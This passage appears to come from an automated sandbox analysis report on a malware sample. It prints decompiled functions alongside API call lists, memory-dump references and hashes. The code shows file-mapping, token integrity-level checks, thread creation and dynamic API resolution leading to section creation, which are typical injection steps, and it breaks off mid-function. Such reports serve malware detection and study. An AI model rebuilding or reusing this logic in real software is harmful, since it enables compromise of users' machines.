                                                                                                                                                                                              • Opcode ID: fe15029f222bd8141554f26c351db78eb91d1031d07160b9d36ddc8575c64b0e
                                                                                                                                                                                              • Instruction ID: e6be1d5861614ac6425320004a4dff653387c0a91e82e467ee5b9f2b348897e4
                                                                                                                                                                                              • Opcode Fuzzy Hash: fe15029f222bd8141554f26c351db78eb91d1031d07160b9d36ddc8575c64b0e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 52514A71808318AFC720AF159C44E7BFBE9EB85720F55CA1AFAA4D2250D770C954CBB6
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 74%
                                                                                                                                                                                              			E00DF1A4E(intOrPtr __edx, void** _a4, void** _a8) {
                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                              				struct _FILETIME* _v12;
                                                                                                                                                                                              				short _v56;
                                                                                                                                                                                              				struct _FILETIME* _t12;
                                                                                                                                                                                              				intOrPtr _t13;
                                                                                                                                                                                              				void* _t17;
                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                              				intOrPtr _t27;
                                                                                                                                                                                              				long _t28;
                                                                                                                                                                                              				void* _t30;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t27 = __edx;
                                                                                                                                                                                              				_t12 =  &_v12;
                                                                                                                                                                                              				GetSystemTimeAsFileTime(_t12);
                                                                                                                                                                                              				_push(0x192);
                                                                                                                                                                                              				_push(0x54d38000);
                                                                                                                                                                                              				_push(_v8);
                                                                                                                                                                                              				_push(_v12);
                                                                                                                                                                                              				L00DFB082();
                                                                                                                                                                                              				_push(_t12);
                                                                                                                                                                                              				_v12 = _t12;
                                                                                                                                                                                              				_t13 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              				_t5 = _t13 + 0xdfe836; // 0x4c08dde
                                                                                                                                                                                              				_t6 = _t13 + 0xdfe59c; // 0x530025
                                                                                                                                                                                              				_push(0x16);
                                                                                                                                                                                              				_push( &_v56);
                                                                                                                                                                                              				_v8 = _t27;
                                                                                                                                                                                              				L00DFAD1A();
                                                                                                                                                                                              				_t17 = CreateFileMappingW(0xffffffff, 0xdfd2a8, 4, 0, 0x1000,  &_v56); // executed
                                                                                                                                                                                              				_t30 = _t17;
                                                                                                                                                                                              				if(_t30 == 0) {
                                                                                                                                                                                              					_t28 = GetLastError();
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					if(GetLastError() == 0xb7) {
                                                                                                                                                                                              						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                                                                                                                                                              						if(_t21 == 0) {
                                                                                                                                                                                              							_t28 = GetLastError();
                                                                                                                                                                                              							if(_t28 != 0) {
                                                                                                                                                                                              								goto L6;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							 *_a4 = _t30;
                                                                                                                                                                                              							 *_a8 = _t21;
                                                                                                                                                                                              							_t28 = 0;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t28 = 2;
                                                                                                                                                                                              						L6:
                                                                                                                                                                                              						CloseHandle(_t30);
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t28;
                                                                                                                                                                                              			}













                                                                                                                                                                                              0x00df1a4e
                                                                                                                                                                                              0x00df1a56
                                                                                                                                                                                              0x00df1a5a
                                                                                                                                                                                              0x00df1a60
                                                                                                                                                                                              0x00df1a65
                                                                                                                                                                                              0x00df1a6a
                                                                                                                                                                                              0x00df1a6d
                                                                                                                                                                                              0x00df1a70
                                                                                                                                                                                              0x00df1a75
                                                                                                                                                                                              0x00df1a76
                                                                                                                                                                                              0x00df1a79
                                                                                                                                                                                              0x00df1a7e
                                                                                                                                                                                              0x00df1a85
                                                                                                                                                                                              0x00df1a8f
                                                                                                                                                                                              0x00df1a91
                                                                                                                                                                                              0x00df1a92
                                                                                                                                                                                              0x00df1a95
                                                                                                                                                                                              0x00df1ab1
                                                                                                                                                                                              0x00df1ab7
                                                                                                                                                                                              0x00df1abb
                                                                                                                                                                                              0x00df1b09
                                                                                                                                                                                              0x00df1abd
                                                                                                                                                                                              0x00df1aca
                                                                                                                                                                                              0x00df1ada
                                                                                                                                                                                              0x00df1ae2
                                                                                                                                                                                              0x00df1af4
                                                                                                                                                                                              0x00df1af8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df1ae4
                                                                                                                                                                                              0x00df1ae7
                                                                                                                                                                                              0x00df1aec
                                                                                                                                                                                              0x00df1aee
                                                                                                                                                                                              0x00df1aee
                                                                                                                                                                                              0x00df1acc
                                                                                                                                                                                              0x00df1ace
                                                                                                                                                                                              0x00df1afa
                                                                                                                                                                                              0x00df1afb
                                                                                                                                                                                              0x00df1afb
                                                                                                                                                                                              0x00df1aca
                                                                                                                                                                                              0x00df1b10

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,00DF4996,?,?,4D283A53,?,?), ref: 00DF1A5A
                                                                                                                                                                                              • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00DF1A70
                                                                                                                                                                                              • _snwprintf.NTDLL ref: 00DF1A95
                                                                                                                                                                                              • CreateFileMappingW.KERNELBASE(000000FF,00DFD2A8,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 00DF1AB1
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,00DF4996,?,?,4D283A53,?), ref: 00DF1AC3
                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00DF1ADA
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,00DF4996,?,?,4D283A53), ref: 00DF1AFB
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,00DF4996,?,?,4D283A53,?), ref: 00DF1B03
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1814172918-0
                                                                                                                                                                                              • Opcode ID: 1d2a5251171015655b546b6e84d35f477074cc43ca383b6d7929a01799fe078f
                                                                                                                                                                                              • Instruction ID: 32d9982c30577b02a9e4a6f570f71a611df0377be1f320c9dd73184a26d5c1c7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d2a5251171015655b546b6e84d35f477074cc43ca383b6d7929a01799fe078f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4121A17660020CFFD721EB68CD45FAA37B9AB44711F268121F606E6290EA70D906CB70
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00DF53E3(long* _a4) {
                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                              				void _v16;
                                                                                                                                                                                              				long _v20;
                                                                                                                                                                                              				int _t33;
                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v16 = 1;
                                                                                                                                                                                              				_v20 = 0x2000;
                                                                                                                                                                                              				if( *0xdfd25c > 5) {
                                                                                                                                                                                              					_v16 = 0;
                                                                                                                                                                                              					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                                                                                                                                                              						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                                                                                                                                                              						_v8 = 0;
                                                                                                                                                                                              						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                                                                                                                                                              						if(_v8 != 0) {
                                                                                                                                                                                              							_t46 = E00DF58BE(_v8);
                                                                                                                                                                                              							if(_t46 != 0) {
                                                                                                                                                                                              								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                                                                                                                                                              								if(_t33 != 0) {
                                                                                                                                                                                              									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                                                                                                                                                              								}
                                                                                                                                                                                              								E00DF147E(_t46);
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						CloseHandle(_v12);
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				 *_a4 = _v20;
                                                                                                                                                                                              				return _v16;
                                                                                                                                                                                              			}









                                                                                                                                                                                              0x00df53f0
                                                                                                                                                                                              0x00df53f7
                                                                                                                                                                                              0x00df53fe
                                                                                                                                                                                              0x00df5412
                                                                                                                                                                                              0x00df541d
                                                                                                                                                                                              0x00df5435
                                                                                                                                                                                              0x00df5442
                                                                                                                                                                                              0x00df5445
                                                                                                                                                                                              0x00df544a
                                                                                                                                                                                              0x00df5455
                                                                                                                                                                                              0x00df5459
                                                                                                                                                                                              0x00df5468
                                                                                                                                                                                              0x00df546c
                                                                                                                                                                                              0x00df5488
                                                                                                                                                                                              0x00df5488
                                                                                                                                                                                              0x00df548c
                                                                                                                                                                                              0x00df548c
                                                                                                                                                                                              0x00df5491
                                                                                                                                                                                              0x00df5495
                                                                                                                                                                                              0x00df549b
                                                                                                                                                                                              0x00df549c
                                                                                                                                                                                              0x00df54a3
                                                                                                                                                                                              0x00df54a9

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00DF5415
                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 00DF5435
                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00DF5445
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00DF5495
                                                                                                                                                                                                • Part of subcall function 00DF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00DF1C51), ref: 00DF58CA
                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00DF5468
                                                                                                                                                                                              • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00DF5470
                                                                                                                                                                                              • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00DF5480
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1295030180-0
                                                                                                                                                                                              • Opcode ID: 0ef67e3dbc42e3a06a7c9dacb1fea34e29fbb3dacc144cdb10523b0121810dd8
                                                                                                                                                                                              • Instruction ID: 1aaf079f4163338776757395b92607081d11b4d68744c6245969a9270806eb10
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ef67e3dbc42e3a06a7c9dacb1fea34e29fbb3dacc144cdb10523b0121810dd8
                                                                                                                                                                                              • Instruction Fuzzy Hash: F921287590021CFFEB009FA4DC45EBEBBBAEB49304F0080A5E610A6261CB719A45EB70
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 89%
                                                                                                                                                                                              			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                              				struct _SECURITY_ATTRIBUTES* _v8;
                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				void* __ebp;
                                                                                                                                                                                              				long _t9;
                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                              				void* _t18;
                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                              				void* _t36;
                                                                                                                                                                                              
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_t9 = _a8;
                                                                                                                                                                                              				_v8 = 1;
                                                                                                                                                                                              				if(_t9 == 0) {
                                                                                                                                                                                              					_t10 = InterlockedDecrement(0xa84108);
                                                                                                                                                                                              					__eflags = _t10;
                                                                                                                                                                                              					if(_t10 == 0) {
                                                                                                                                                                                              						__eflags =  *0xa8410c;
                                                                                                                                                                                              						if( *0xa8410c != 0) {
                                                                                                                                                                                              							_t36 = 0x2710;
                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                              								SleepEx(0x64, 1);
                                                                                                                                                                                              								__eflags =  *0xa84118;
                                                                                                                                                                                              								if( *0xa84118 == 0) {
                                                                                                                                                                                              									break;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t36 = _t36 - 0x64;
                                                                                                                                                                                              								__eflags = _t36;
                                                                                                                                                                                              								if(_t36 > 0) {
                                                                                                                                                                                              									continue;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								break;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							CloseHandle( *0xa8410c);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						HeapDestroy( *0xa84110);
                                                                                                                                                                                              					}
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					if(_t9 == 1 && InterlockedIncrement(0xa84108) == 1) {
                                                                                                                                                                                              						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                              						 *0xa84110 = _t18;
                                                                                                                                                                                              						_t41 = _t18;
                                                                                                                                                                                              						if(_t18 == 0) {
                                                                                                                                                                                              							L6:
                                                                                                                                                                                              							_v8 = 0;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							 *0xa84130 = _a4;
                                                                                                                                                                                              							asm("lock xadd [eax], ebx");
                                                                                                                                                                                              							_t23 = CreateThread(0, 0, E00A8103B, E00A8105A(_a12, 0, 0xa84118, _t41), 0,  &_a8); // executed
                                                                                                                                                                                              							 *0xa8410c = _t23;
                                                                                                                                                                                              							if(_t23 == 0) {
                                                                                                                                                                                              								asm("lock xadd [esi], eax");
                                                                                                                                                                                              								goto L6;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _v8;
                                                                                                                                                                                              			}












                                                                                                                                                                                              0x00a81957
                                                                                                                                                                                              0x00a81963
                                                                                                                                                                                              0x00a81965
                                                                                                                                                                                              0x00a81968
                                                                                                                                                                                              0x00a819e2
                                                                                                                                                                                              0x00a819e8
                                                                                                                                                                                              0x00a819ea
                                                                                                                                                                                              0x00a819ec
                                                                                                                                                                                              0x00a819f2
                                                                                                                                                                                              0x00a819f4
                                                                                                                                                                                              0x00a819f9
                                                                                                                                                                                              0x00a819fc
                                                                                                                                                                                              0x00a81a07
                                                                                                                                                                                              0x00a81a09
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a81a0b
                                                                                                                                                                                              0x00a81a0e
                                                                                                                                                                                              0x00a81a10
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a81a10
                                                                                                                                                                                              0x00a81a18
                                                                                                                                                                                              0x00a81a18
                                                                                                                                                                                              0x00a81a24
                                                                                                                                                                                              0x00a81a24
                                                                                                                                                                                              0x00a8196a
                                                                                                                                                                                              0x00a8196b
                                                                                                                                                                                              0x00a8198b
                                                                                                                                                                                              0x00a81991
                                                                                                                                                                                              0x00a81996
                                                                                                                                                                                              0x00a81998
                                                                                                                                                                                              0x00a819d8
                                                                                                                                                                                              0x00a819d8
                                                                                                                                                                                              0x00a8199a
                                                                                                                                                                                              0x00a819a2
                                                                                                                                                                                              0x00a819a9
                                                                                                                                                                                              0x00a819c2
                                                                                                                                                                                              0x00a819c8
                                                                                                                                                                                              0x00a819cf
                                                                                                                                                                                              0x00a819d4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a819d4
                                                                                                                                                                                              0x00a819cf
                                                                                                                                                                                              0x00a81998
                                                                                                                                                                                              0x00a8196b
                                                                                                                                                                                              0x00a81a31

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(00A84108), ref: 00A81976
                                                                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00A8198B
                                                                                                                                                                                              • CreateThread.KERNEL32 ref: 00A819C2
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(00A84108), ref: 00A819E2
                                                                                                                                                                                              • SleepEx.KERNEL32(00000064,00000001), ref: 00A819FC
                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 00A81A18
                                                                                                                                                                                              • HeapDestroy.KERNEL32 ref: 00A81A24
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.612932571.0000000000A80000.00000040.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.612964625.0000000000A85000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.612984516.0000000000A87000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3416589138-0
                                                                                                                                                                                              • Opcode ID: fe08347530ea38ab6509c74a55f654b3692aa2fbdf4f68e182f3b2064165a6c0
                                                                                                                                                                                              • Instruction ID: c01be8cd132e478ae0f5a216f4b8f6f6179e2bbae4ad1d1128527d6030a9e5a8
                                                                                                                                                                                              • Opcode Fuzzy Hash: fe08347530ea38ab6509c74a55f654b3692aa2fbdf4f68e182f3b2064165a6c0
                                                                                                                                                                                              • Instruction Fuzzy Hash: D521A832A41206EFCB11EFE9DC88969BBBCF769B917144625F505D3150E7348E438F50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00DFA09B
                                                                                                                                                                                              • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 00DFA11E
                                                                                                                                                                                              • StrStrIW.SHLWAPI(00000000,006E0069), ref: 00DFA15E
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00DFA180
                                                                                                                                                                                                • Part of subcall function 00DF91B5: SysAllocString.OLEAUT32(00DFC298), ref: 00DF9205
                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(00000000), ref: 00DFA1D3
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00DFA1E2
                                                                                                                                                                                                • Part of subcall function 00DFA872: Sleep.KERNEL32(000001F4), ref: 00DFA8BA
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2118684380-0
                                                                                                                                                                                              • Opcode ID: 0ae5e082254257890fd540fb15b3541459e9a8406fc2ffc094c25ef99b925a7a
                                                                                                                                                                                              • Instruction ID: b3d55b95baff810fdd069331b135d3543211d9f79d845d55f4e989f38ca59fb6
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ae5e082254257890fd540fb15b3541459e9a8406fc2ffc094c25ef99b925a7a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F511D75500709AFDB01DFA8C844AAAB7B6FF88740F168469E619DB220EB71ED05CB71
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00A81F61(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                              				_Unknown_base(*)()* _t28;
                                                                                                                                                                                              				_Unknown_base(*)()* _t32;
                                                                                                                                                                                              				_Unknown_base(*)()* _t35;
                                                                                                                                                                                              				_Unknown_base(*)()* _t38;
                                                                                                                                                                                              				_Unknown_base(*)()* _t41;
                                                                                                                                                                                              				intOrPtr _t44;
                                                                                                                                                                                              				struct HINSTANCE__* _t48;
                                                                                                                                                                                              				intOrPtr _t54;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t54 = E00A81026(0x20);
                                                                                                                                                                                              				if(_t54 == 0) {
                                                                                                                                                                                              					_v8 = 8;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t48 = GetModuleHandleA( *0xa84144 + 0xa85014);
                                                                                                                                                                                              					_v8 = 0x7f;
                                                                                                                                                                                              					_t28 = GetProcAddress(_t48,  *0xa84144 + 0xa8514c);
                                                                                                                                                                                              					 *(_t54 + 0xc) = _t28;
                                                                                                                                                                                              					if(_t28 == 0) {
                                                                                                                                                                                              						L8:
                                                                                                                                                                                              						E00A81938(_t54);
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t32 = GetProcAddress(_t48,  *0xa84144 + 0xa8515c);
                                                                                                                                                                                              						 *(_t54 + 0x10) = _t32;
                                                                                                                                                                                              						if(_t32 == 0) {
                                                                                                                                                                                              							goto L8;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t35 = GetProcAddress(_t48,  *0xa84144 + 0xa8516f);
                                                                                                                                                                                              							 *(_t54 + 0x14) = _t35;
                                                                                                                                                                                              							if(_t35 == 0) {
                                                                                                                                                                                              								goto L8;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_t38 = GetProcAddress(_t48,  *0xa84144 + 0xa85184);
                                                                                                                                                                                              								 *(_t54 + 0x18) = _t38;
                                                                                                                                                                                              								if(_t38 == 0) {
                                                                                                                                                                                              									goto L8;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									_t41 = GetProcAddress(_t48,  *0xa84144 + 0xa8519a);
                                                                                                                                                                                              									 *(_t54 + 0x1c) = _t41;
                                                                                                                                                                                              									if(_t41 == 0) {
                                                                                                                                                                                              										goto L8;
                                                                                                                                                                                              									} else {
                                                                                                                                                                                              										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                                                                                                              										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                                                                                                              										_t44 = E00A81A34(_t54, _a8); // executed
                                                                                                                                                                                              										_v8 = _t44;
                                                                                                                                                                                              										if(_t44 != 0) {
                                                                                                                                                                                              											goto L8;
                                                                                                                                                                                              										} else {
                                                                                                                                                                                              											 *_a12 = _t54;
                                                                                                                                                                                              										}
                                                                                                                                                                                              									}
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _v8;
                                                                                                                                                                                              			}












                                                                                                                                                                                              0x00a81f70
                                                                                                                                                                                              0x00a81f74
                                                                                                                                                                                              0x00a82036
                                                                                                                                                                                              0x00a81f7a
                                                                                                                                                                                              0x00a81f92
                                                                                                                                                                                              0x00a81fa1
                                                                                                                                                                                              0x00a81fa8
                                                                                                                                                                                              0x00a81faa
                                                                                                                                                                                              0x00a81faf
                                                                                                                                                                                              0x00a8202e
                                                                                                                                                                                              0x00a8202f
                                                                                                                                                                                              0x00a81fb1
                                                                                                                                                                                              0x00a81fbe
                                                                                                                                                                                              0x00a81fc0
                                                                                                                                                                                              0x00a81fc5
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a81fc7
                                                                                                                                                                                              0x00a81fd4
                                                                                                                                                                                              0x00a81fd6
                                                                                                                                                                                              0x00a81fdb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a81fdd
                                                                                                                                                                                              0x00a81fea
                                                                                                                                                                                              0x00a81fec
                                                                                                                                                                                              0x00a81ff1
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a81ff3
                                                                                                                                                                                              0x00a82000
                                                                                                                                                                                              0x00a82002
                                                                                                                                                                                              0x00a82007
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a82009
                                                                                                                                                                                              0x00a8200f
                                                                                                                                                                                              0x00a82014
                                                                                                                                                                                              0x00a8201b
                                                                                                                                                                                              0x00a82020
                                                                                                                                                                                              0x00a82025
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a82027
                                                                                                                                                                                              0x00a8202a
                                                                                                                                                                                              0x00a8202a
                                                                                                                                                                                              0x00a82025
                                                                                                                                                                                              0x00a82007
                                                                                                                                                                                              0x00a81ff1
                                                                                                                                                                                              0x00a81fdb
                                                                                                                                                                                              0x00a81fc5
                                                                                                                                                                                              0x00a81faf
                                                                                                                                                                                              0x00a82044

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00A81026: HeapAlloc.KERNEL32(00000000,?,00A81329,00000208,?,-00000008,?,?,?,00A8122F,?), ref: 00A81032
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,00A81B06,?,?,?,?,00000002,?,?), ref: 00A81F86
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00A81FA8
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00A81FBE
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00A81FD4
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00A81FEA
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00A82000
                                                                                                                                                                                                • Part of subcall function 00A81A34: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 00A81A91
                                                                                                                                                                                                • Part of subcall function 00A81A34: memset.NTDLL ref: 00A81AB3
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.612932571.0000000000A80000.00000040.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.612964625.0000000000A85000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.612984516.0000000000A87000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1632424568-0
                                                                                                                                                                                              • Opcode ID: 13d8b391e60a4dfbc8fa4e623da8819977face7d52c9058d0136dc9e9dff1ff1
                                                                                                                                                                                              • Instruction ID: c7838a6791b5c4c911a6d8072347a1fdefed42e38dde96a31b652cda066b7a1f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 13d8b391e60a4dfbc8fa4e623da8819977face7d52c9058d0136dc9e9dff1ff1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 50212CB560060AAFD721EFA9DD88E6AB7FCEF143447014166F949D7211E770ED05CB60
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 54%
                                                                                                                                                                                              			E00DF7C75(char* __eax) {
                                                                                                                                                                                              				char* _t8;
                                                                                                                                                                                              				intOrPtr _t12;
                                                                                                                                                                                              				char* _t21;
                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                              				char* _t24;
                                                                                                                                                                                              				signed int _t26;
                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t21 = __eax;
                                                                                                                                                                                              				_push(0x20);
                                                                                                                                                                                              				_t23 = 1;
                                                                                                                                                                                              				_push(__eax);
                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                              					_t8 = StrChrA();
                                                                                                                                                                                              					if(_t8 == 0) {
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
